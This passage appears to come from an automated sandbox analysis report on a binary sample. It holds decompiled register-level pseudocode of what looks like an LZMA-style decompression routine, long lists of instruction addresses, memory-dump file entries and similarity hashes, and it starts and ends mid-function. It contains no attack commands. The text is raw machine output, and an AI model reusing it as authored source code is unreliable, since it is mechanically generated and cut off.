											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                        0x00000000
                                                                                        0x004063d0
                                                                                        0x004063d0
                                                                                        0x004063d4
                                                                                        0x004063f5
                                                                                        0x004063fc
                                                                                        0x00406402
                                                                                        0x00406408
                                                                                        0x0040641a
                                                                                        0x00406420
                                                                                        0x00406425
                                                                                        0x00000000
                                                                                        0x004063d6
                                                                                        0x004063dc
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067ee
                                                                                        0x004067f2
                                                                                        0x004069a1
                                                                                        0x004069b7
                                                                                        0x004069bf
                                                                                        0x004069c6
                                                                                        0x004069c8
                                                                                        0x004069cf
                                                                                        0x004069d3
                                                                                        0x004069d3
                                                                                        0x004067fe
                                                                                        0x00406805
                                                                                        0x0040680d
                                                                                        0x00406810
                                                                                        0x00406813
                                                                                        0x00406813
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fbe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x00000000
                                                                                        0x00405fcf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fd8
                                                                                        0x00405fdb
                                                                                        0x00405fde
                                                                                        0x00405fe2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fe8
                                                                                        0x00405feb
                                                                                        0x00405fed
                                                                                        0x00405fee
                                                                                        0x00405ff1
                                                                                        0x00405ff3
                                                                                        0x00405ff4
                                                                                        0x00405ff6
                                                                                        0x00405ff9
                                                                                        0x00405ffe
                                                                                        0x00406003
                                                                                        0x0040600c
                                                                                        0x0040601f
                                                                                        0x00406022
                                                                                        0x0040602e
                                                                                        0x00406056
                                                                                        0x00406058
                                                                                        0x00406066
                                                                                        0x00406066
                                                                                        0x0040606a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x0040605a
                                                                                        0x0040605d
                                                                                        0x0040605e
                                                                                        0x0040605e
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x00406034
                                                                                        0x00406039
                                                                                        0x00406039
                                                                                        0x00406042
                                                                                        0x0040604a
                                                                                        0x0040604d
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406070
                                                                                        0x00406070
                                                                                        0x00406074
                                                                                        0x00406920
                                                                                        0x00000000
                                                                                        0x00406920
                                                                                        0x0040607d
                                                                                        0x0040608d
                                                                                        0x00406090
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406096
                                                                                        0x0040609a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040609c
                                                                                        0x004060a2
                                                                                        0x004060cc
                                                                                        0x004060d2
                                                                                        0x004060d9
                                                                                        0x00000000
                                                                                        0x004060d9
                                                                                        0x004060a8
                                                                                        0x004060ab
                                                                                        0x004060b0
                                                                                        0x004060b0
                                                                                        0x004060bb
                                                                                        0x004060c3
                                                                                        0x004060c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040610b
                                                                                        0x00406111
                                                                                        0x00406114
                                                                                        0x00406121
                                                                                        0x00406129
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004060e0
                                                                                        0x004060e0
                                                                                        0x004060e4
                                                                                        0x0040692f
                                                                                        0x00000000
                                                                                        0x0040692f
                                                                                        0x004060f0
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fe
                                                                                        0x00406101
                                                                                        0x00406104
                                                                                        0x00406109
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406131
                                                                                        0x00406133
                                                                                        0x00406136
                                                                                        0x004061a7
                                                                                        0x004061aa
                                                                                        0x004061ad
                                                                                        0x004061b4
                                                                                        0x004061be
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x00406138
                                                                                        0x0040613c
                                                                                        0x0040613f
                                                                                        0x00406141
                                                                                        0x00406144
                                                                                        0x00406147
                                                                                        0x00406149
                                                                                        0x0040614c
                                                                                        0x0040614e
                                                                                        0x00406153
                                                                                        0x00406156
                                                                                        0x00406159
                                                                                        0x0040615d
                                                                                        0x00406164
                                                                                        0x00406167
                                                                                        0x0040616e
                                                                                        0x00406172
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x0040617e
                                                                                        0x00406181
                                                                                        0x0040619f
                                                                                        0x004061a1
                                                                                        0x00000000
                                                                                        0x00406183
                                                                                        0x00406183
                                                                                        0x00406186
                                                                                        0x00406189
                                                                                        0x0040618c
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x00406191
                                                                                        0x00406194
                                                                                        0x00406196
                                                                                        0x00406197
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040643a
                                                                                        0x0040643e
                                                                                        0x00406461
                                                                                        0x00406464
                                                                                        0x00406467
                                                                                        0x00406471
                                                                                        0x00406440
                                                                                        0x00406440
                                                                                        0x00406443
                                                                                        0x00406446
                                                                                        0x00406449
                                                                                        0x00406456
                                                                                        0x00406459
                                                                                        0x00406459
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040647d
                                                                                        0x00406481
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406487
                                                                                        0x0040648b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406491
                                                                                        0x00406493
                                                                                        0x00406497
                                                                                        0x00406497
                                                                                        0x0040649a
                                                                                        0x0040649e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064ee
                                                                                        0x004064f2
                                                                                        0x004064f9
                                                                                        0x004064fc
                                                                                        0x004064ff
                                                                                        0x00406509
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x004064f4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406515
                                                                                        0x00406519
                                                                                        0x00406520
                                                                                        0x00406523
                                                                                        0x00406526
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x00406529
                                                                                        0x0040652c
                                                                                        0x0040652f
                                                                                        0x0040652f
                                                                                        0x00406532
                                                                                        0x00406535
                                                                                        0x00406538
                                                                                        0x00406538
                                                                                        0x0040653b
                                                                                        0x00406542
                                                                                        0x00406547
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065d5
                                                                                        0x004065d5
                                                                                        0x004065d9
                                                                                        0x00406977
                                                                                        0x00000000
                                                                                        0x00406977
                                                                                        0x004065df
                                                                                        0x004065e2
                                                                                        0x004065e5
                                                                                        0x004065e9
                                                                                        0x004065ec
                                                                                        0x004065f2
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f7
                                                                                        0x004065fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061ca
                                                                                        0x004061ca
                                                                                        0x004061ce
                                                                                        0x0040693b
                                                                                        0x00000000
                                                                                        0x0040693b
                                                                                        0x004061d4
                                                                                        0x004061d7
                                                                                        0x004061da
                                                                                        0x004061de
                                                                                        0x004061e1
                                                                                        0x004061e7
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061ec
                                                                                        0x004061ef
                                                                                        0x004061ef
                                                                                        0x004061f2
                                                                                        0x004061f5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061fb
                                                                                        0x00406201
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406207
                                                                                        0x00406207
                                                                                        0x0040620b
                                                                                        0x0040620e
                                                                                        0x00406211
                                                                                        0x00406214
                                                                                        0x00406217
                                                                                        0x00406218
                                                                                        0x0040621b
                                                                                        0x0040621d
                                                                                        0x00406223
                                                                                        0x00406226
                                                                                        0x00406229
                                                                                        0x0040622c
                                                                                        0x0040622f
                                                                                        0x00406232
                                                                                        0x00406235
                                                                                        0x00406251
                                                                                        0x00406254
                                                                                        0x00406257
                                                                                        0x0040625a
                                                                                        0x00406261
                                                                                        0x00406265
                                                                                        0x00406267
                                                                                        0x0040626b
                                                                                        0x00406237
                                                                                        0x00406237
                                                                                        0x0040623b
                                                                                        0x00406243
                                                                                        0x00406248
                                                                                        0x0040624a
                                                                                        0x0040624c
                                                                                        0x0040624c
                                                                                        0x0040626e
                                                                                        0x00406275
                                                                                        0x00406278
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x00406283
                                                                                        0x00406283
                                                                                        0x00406287
                                                                                        0x00406947
                                                                                        0x00000000
                                                                                        0x00406947
                                                                                        0x0040628d
                                                                                        0x00406290
                                                                                        0x00406293
                                                                                        0x00406297
                                                                                        0x0040629a
                                                                                        0x004062a0
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a5
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004062b0
                                                                                        0x004062b3
                                                                                        0x004062b6
                                                                                        0x004062b9
                                                                                        0x004062bc
                                                                                        0x004062bf
                                                                                        0x004062c2
                                                                                        0x004062c5
                                                                                        0x004062c8
                                                                                        0x004062cb
                                                                                        0x004062ce
                                                                                        0x004062e6
                                                                                        0x004062e9
                                                                                        0x004062ec
                                                                                        0x004062ef
                                                                                        0x004062ef
                                                                                        0x004062f2
                                                                                        0x004062f6
                                                                                        0x004062f8
                                                                                        0x004062d0
                                                                                        0x004062d0
                                                                                        0x004062d8
                                                                                        0x004062dd
                                                                                        0x004062df
                                                                                        0x004062e1
                                                                                        0x004062e1
                                                                                        0x004062fb
                                                                                        0x00406302
                                                                                        0x00406305
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00406305
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406347
                                                                                        0x00406347
                                                                                        0x0040634b
                                                                                        0x00406953
                                                                                        0x00000000
                                                                                        0x00406953
                                                                                        0x00406351
                                                                                        0x00406354
                                                                                        0x00406357
                                                                                        0x0040635b
                                                                                        0x0040635e
                                                                                        0x00406364
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406369
                                                                                        0x0040636c
                                                                                        0x0040636c
                                                                                        0x00406372
                                                                                        0x00406310
                                                                                        0x00406310
                                                                                        0x00406313
                                                                                        0x00000000
                                                                                        0x00406313
                                                                                        0x00406374
                                                                                        0x00406374
                                                                                        0x00406377
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406380
                                                                                        0x00406383
                                                                                        0x00406386
                                                                                        0x00406389
                                                                                        0x0040638c
                                                                                        0x0040638f
                                                                                        0x00406392
                                                                                        0x004063aa
                                                                                        0x004063ad
                                                                                        0x004063b0
                                                                                        0x004063b3
                                                                                        0x004063b3
                                                                                        0x004063b6
                                                                                        0x004063ba
                                                                                        0x004063bc
                                                                                        0x00406394
                                                                                        0x00406394
                                                                                        0x0040639c
                                                                                        0x004063a1
                                                                                        0x004063a3
                                                                                        0x004063a5
                                                                                        0x004063a5
                                                                                        0x004063bf
                                                                                        0x004063c6
                                                                                        0x004063c9
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x00406658
                                                                                        0x00406658
                                                                                        0x0040665c
                                                                                        0x00406983
                                                                                        0x00000000
                                                                                        0x00406983
                                                                                        0x00406662
                                                                                        0x00406665
                                                                                        0x00406668
                                                                                        0x0040666c
                                                                                        0x0040666f
                                                                                        0x00406675
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406428
                                                                                        0x00406428
                                                                                        0x0040642b
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x00406767
                                                                                        0x0040676b
                                                                                        0x0040678d
                                                                                        0x00406790
                                                                                        0x0040679a
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040676d
                                                                                        0x00406770
                                                                                        0x00406774
                                                                                        0x00406777
                                                                                        0x00406777
                                                                                        0x0040677a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406824
                                                                                        0x00406828
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x0040685b
                                                                                        0x0040685b
                                                                                        0x00000000
                                                                                        0x0040685b
                                                                                        0x0040682a
                                                                                        0x0040682d
                                                                                        0x00406830
                                                                                        0x00406833
                                                                                        0x0040683a
                                                                                        0x0040677e
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406566
                                                                                        0x00406569
                                                                                        0x0040656c
                                                                                        0x0040656e
                                                                                        0x00406570
                                                                                        0x00406570
                                                                                        0x00406571
                                                                                        0x00406574
                                                                                        0x0040657b
                                                                                        0x0040657e
                                                                                        0x0040658c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406871
                                                                                        0x00406871
                                                                                        0x00406875
                                                                                        0x004069ad
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x0040687b
                                                                                        0x0040687e
                                                                                        0x00406881
                                                                                        0x00406885
                                                                                        0x00406888
                                                                                        0x0040688e
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406893
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406899
                                                                                        0x00406899
                                                                                        0x0040689d
                                                                                        0x004068fd
                                                                                        0x00406900
                                                                                        0x00406905
                                                                                        0x00406906
                                                                                        0x00406908
                                                                                        0x0040690a
                                                                                        0x0040690d
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x0040681f
                                                                                        0x00406819
                                                                                        0x0040689f
                                                                                        0x004068a5
                                                                                        0x004068a8
                                                                                        0x004068ab
                                                                                        0x004068ae
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b7
                                                                                        0x004068ba
                                                                                        0x004068bd
                                                                                        0x004068c0
                                                                                        0x004068d9
                                                                                        0x004068dc
                                                                                        0x004068df
                                                                                        0x004068e2
                                                                                        0x004068e6
                                                                                        0x004068e8
                                                                                        0x004068e8
                                                                                        0x004068e9
                                                                                        0x004068ec
                                                                                        0x004068c2
                                                                                        0x004068c2
                                                                                        0x004068ca
                                                                                        0x004068cf
                                                                                        0x004068d1
                                                                                        0x004068d4
                                                                                        0x004068d4
                                                                                        0x004068ef
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406316
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064a1
                                                                                        0x004064a1
                                                                                        0x004064a5
                                                                                        0x0040696b
                                                                                        0x00000000
                                                                                        0x0040696b
                                                                                        0x004064ab
                                                                                        0x004064ae
                                                                                        0x004064b1
                                                                                        0x004064b4
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b9
                                                                                        0x004064bc
                                                                                        0x004064bf
                                                                                        0x004064c2
                                                                                        0x004064c5
                                                                                        0x004064c8
                                                                                        0x004064c9
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064ce
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064da
                                                                                        0x004064dc
                                                                                        0x004064dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x004064df
                                                                                        0x004064df
                                                                                        0x00000000
                                                                                        0x004064df
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x004069cc
                                                                                        0x004069cc
                                                                                        0x00000000
                                                                                        0x004069cc
                                                                                        0x00406819
                                                                                        0x004067a0
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x004063d4

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                        • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                        • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                        • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
